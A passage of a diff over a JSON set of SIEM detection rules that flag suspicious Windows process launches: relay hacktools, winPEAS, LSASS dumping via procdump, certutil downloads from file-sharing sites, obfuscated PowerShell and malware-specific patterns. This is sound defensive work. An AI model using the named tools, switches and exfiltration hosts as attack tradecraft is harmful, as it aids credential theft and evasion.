'%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_import_module_susp_dirs.yml" + "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" }, { - "title": "OilRig APT Activity", - "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", - "status": "test", - "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "Active Directory Structure Export Via Csvde.EXE", + "id": "e5d36acd-acb4-4c6f-a13f-9eb203d50099", + "status": "experimental", + "description": "Detects the execution of \"csvde.exe\" in order to export organizational Active Directory structure.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.exfiltration" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' 
ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\csvde.exe' ESCAPE '\\' OR OriginalFileName = 'csvde.exe') AND CommandLine LIKE '% -f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_oilrig_mar18.yml" + "filename": "proc_creation_win_csvde_export.yml" }, { - "title": "Potential SMB Relay Attack Tool Execution", - "id": "5589ab4f-a767-433c-961d-c91f3f704db1", + "title": "Pingback Backdoor Activity", + "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", "status": "test", - "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Legitimate files with these rare hacktool names" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%PetitPotam%' ESCAPE '\\' OR NewProcessName LIKE '%RottenPotato%' ESCAPE '\\' OR NewProcessName LIKE '%HotPotato%' ESCAPE '\\' OR NewProcessName LIKE '%JuicyPotato%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\just\\_dce\\_%' ESCAPE '\\' OR NewProcessName LIKE '%Juicy Potato%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\temp\\\\rot.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Potato.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SpoolSample.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Responder.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbrelayx%' ESCAPE '\\' 
OR NewProcessName LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\LocalPotato%' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '% smbrelay%' ESCAPE '\\' OR CommandLine LIKE '% ntlmrelay%' ESCAPE '\\' OR CommandLine LIKE '%cme smb %' ESCAPE '\\' OR CommandLine LIKE '% /ntlm:NTLMhash %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PetitPotam%' ESCAPE '\\' OR CommandLine LIKE '%.exe -t % -p %' ESCAPE '\\') OR (CommandLine LIKE '%.exe -c \"{%' ESCAPE '\\' AND CommandLine LIKE '%}\" -z' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%HotPotatoes6%' ESCAPE '\\' OR NewProcessName LIKE '%HotPotatoes7%' ESCAPE '\\' OR NewProcessName LIKE '%HotPotatoes %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_relay_attacks_tools.yml" + "filename": "proc_creation_win_malware_pingback_backdoor.yml" }, { - "title": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe", - "id": "65d2be45-8600-4042-b4c0-577a1ff8a60e", + "title": "Execute Files with Msdeploy.exe", + "id": "646bc99f-6682-4b47-a73a-17b1b64c9d34", "status": "test", - "description": "Detects defence evasion attempt via odbcconf.exe execution to load DLL", - "author": "Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community", + "description": "Detects file execution using the msdeploy.exe lolbin", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.008" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Legitimate use of odbcconf.exe by legitimate user" + "System administrator Usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND 
(((NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR OriginalFileName = 'odbcconf.exe') AND (CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%-f%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%/f%' ESCAPE '\\' OR CommandLine LIKE '%regsvr%' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%verb:sync%' ESCAPE '\\' AND CommandLine LIKE '%-source:RunCommand%' ESCAPE '\\' AND CommandLine LIKE '%-dest:runCommand%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\msdeploy.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_odbcconf_susp_exec.yml" + "filename": "proc_creation_win_lolbin_msdeploy.yml" }, { - "title": "UAC Bypass WSReset", - "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", - "status": "test", - "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", - "author": "Christian Burkard (Nextron Systems)", + "title": "Persistence Via TypedPaths - CommandLine", + "id": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", + "status": "experimental", + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. 
Which might indicate persistence attempt", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" + "filename": "proc_creation_win_registry_typed_paths_persistence.yml" }, { - "title": "HackTool - winPEAS Execution", - "id": "98b53e78-ebaf-46f8-be06-421aafd176d9", + "title": "Windows Hotfix Updates Reconnaissance Via Wmic.EXE", + "id": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", "status": "experimental", - "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz", - "author": "Georg Lauenstein (sure[secure])", + "description": "Detects the execution of wmic with the \"qfe\" flag in order to obtain information about installed hotfix updates on the system. 
This is often used by pentester and attacker enumeration scripts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1082", - "attack.t1087", - "attack.t1046" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'winPEAS.exe' OR (NewProcessName LIKE '%\\\\winPEASany.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASany\\_ofs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx64\\_ofs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winPEASx86\\_ofs.exe' ESCAPE '\\') OR (CommandLine LIKE '% applicationsinfo%' ESCAPE '\\' OR CommandLine LIKE '% browserinfo%' ESCAPE '\\' OR CommandLine LIKE '% eventsinfo%' ESCAPE '\\' OR CommandLine LIKE '% fileanalysis%' ESCAPE '\\' OR CommandLine LIKE '% filesinfo%' ESCAPE '\\' OR CommandLine LIKE '% processinfo%' ESCAPE '\\' OR CommandLine LIKE '% servicesinfo%' ESCAPE '\\' OR CommandLine LIKE '% windowscreds%' ESCAPE '\\') OR CommandLine LIKE '%https://github.com/carlospolop/PEASS-ng/releases/latest/download/%' ESCAPE '\\' OR ParentCommandLine LIKE '% -linpeas' ESCAPE '\\' OR CommandLine LIKE '% -linpeas' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '% qfe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_winpeas.yml" + "filename": "proc_creation_win_wmic_recon_hotfix.yml" }, { - "title": "Suspicious Mofcomp Execution", - "id": "1dd05363-104e-4b4a-b963-196a534b03a1", - "status": "experimental", - "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by 
having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Trickbot Malware Reconnaissance Activity", + "id": "410ad193-a728-4107-bc79-4419789fcbf8", + "status": "test", + "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", + "author": "David Burkett, Florian Roth", "tags": [ - "attack.execution", - "attack.t1218" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Rare System Admin Activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mofcomp.exe' ESCAPE '\\' OR OriginalFileName = 'mofcomp.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_mofcomp_execution.yml" + "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" }, { - "title": "Delete All Scheduled Tasks", - "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", - "status": "experimental", - "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - DInjector PowerShell Cradle Execution", + "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", + "status": "test", + "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_delete_all.yml" + "filename": "proc_creation_win_hktl_dinjector.yml" }, { - "title": "Hermetic Wiper TG Process Patterns", - "id": "2f974656-6d83-4059-bbdf-68ac5403422f", - "status": "experimental", - "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation", + "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", + "status": "test", + "description": "Detects all variations of obfuscated 
powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.lateral_movement", - "attack.t1021.001" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" }, { - "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage", - "id": "37651c2a-42cd-4a69-ae0d-22a4349aa04a", - "status": "experimental", - "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Rundll32 Execution Without Parameters", + "id": 
"5bb68627-3198-40ca-b458-49f973db8752", + "status": "test", + "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.persistence", - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Installation of unsigned packages for testing purposes" + "False positives may occur if a user called rundll32 from CLI with no options" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AppPackage %' ESCAPE '\\' OR CommandLine LIKE '%Add-AppxPackage %' ESCAPE '\\') AND CommandLine LIKE '% -AllowUnsigned%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine IN ('rundll32.exe', 'rundll32'))" ], - "filename": "proc_creation_win_powershell_install_unsigned_appx_packages.yml" + "filename": "proc_creation_win_rundll32_without_parameters.yml" }, { - "title": "Fireball Archer Install", - "id": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", + "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", + "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", "status": "test", - "description": "Detects Archer malware invocation via rundll32", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ "attack.execution", - "attack.defense_evasion", - "attack.t1218.011" + "attack.persistence", + "attack.t1053.005", + 
"attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%InstallArcherSvc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_fireball.yml" + "filename": "proc_creation_win_schtasks_reg_loader.yml" }, { - "title": "Exploited CVE-2020-10189 Zoho ManageEngine", - "id": "846b866e-2a57-46ee-8e16-85fa92759be7", + "title": "Suspicious MSHTA Child Process", + "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", "status": "test", - "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", + "author": "Michael Haag", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.s0190", - "cve.2020.10189" + "attack.defense_evasion", + "attack.t1218.005", + "car.2013-02-003", + "car.2013-03-001", + "car.2014-04-003" ], "falsepositives": [ - "Unknown" + "Printer software / driver installations", + "HP software" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 
'%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" ], - "filename": "proc_creation_win_exploit_cve_2020_10189.yml" + "filename": "proc_creation_win_mshta_susp_child_processes.yml" }, { - "title": "Sysmon Configuration Update", - "id": "87911521-7098-470b-a459-9a57fc80bdfd", - "status": "test", - "description": "Detects updates to Sysmon's configuration. 
Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely", + "title": "Launch-VsDevShell.PS1 Proxy Execution", + "id": "45d3a03d-f441-458c-8883-df101a3bb146", + "status": "experimental", + "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1216.001" ], "falsepositives": [ - "Legitimate administrators might use this command to update Sysmon configuration." + "Legitimate usage of the script by a developer" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-c%' ESCAPE '\\' OR CommandLine LIKE '%/c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Launch-VsDevShell.ps1%' ESCAPE '\\' AND (CommandLine LIKE '%VsWherePath %' ESCAPE '\\' OR CommandLine LIKE '%VsInstallationPath %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_sysmon_config_update.yml" + "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml" }, { - "title": "Potential LSASS Process Dump Via Procdump", - "id": "5afee48e-67dd-4e03-a783-f74259dcf998", - "status": "stable", - "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. 
This way we're also able to catch cases in which the attacker has renamed the procdump executable.", - "author": "Florian Roth (Nextron Systems)", + "title": "Winrar Execution in Non-Standard Folder", + "id": "4ede543c-e098-43d9-a28f-dd784a13132f", + "status": "test", + "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", + "author": "Florian Roth (Nextron Systems), Tigzy", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.credential_access", - "attack.t1003.001", - "car.2013-05-009" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unlikely, because no one should dump an lsass process memory", - "Another tool that uses the command line switches of Procdump" + "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((NewProcessName LIKE '%\\\\WinRAR%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" + "filename": "proc_creation_win_winrar_execution.yml" }, { - "title": "HackTool - WinRM Access Via Evil-WinRM", - "id": "a197e378-d31b-41c0-9635-cfdf1c1bb423", + "title": "Execute Code with Pester.bat", + "id": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", "status": "test", - "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). 
The adversary may then perform actions as the logged-on user.", - "author": "frack113", + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1021.006" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Unknown" + "Legitimate use of Pester for writing tests for Powershell scripts and modules" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ruby.exe' ESCAPE '\\' AND CommandLine LIKE '%-i %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Pester%' ESCAPE '\\' AND CommandLine LIKE '%Get-Help%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%pester%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\' AND (CommandLine LIKE '%help%' ESCAPE '\\' OR CommandLine LIKE '%_%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_evil_winrm.yml" + "filename": "proc_creation_win_lolbin_pester_1.yml" }, { - "title": "Execution via Diskshadow.exe", - "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", - "status": "test", - "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", - "author": "Ivan Dyachkov, oscd.community", + "title": "HackTool - Wmiexec Default Powershell Command", + "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", + "status": "experimental", + "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218" + 
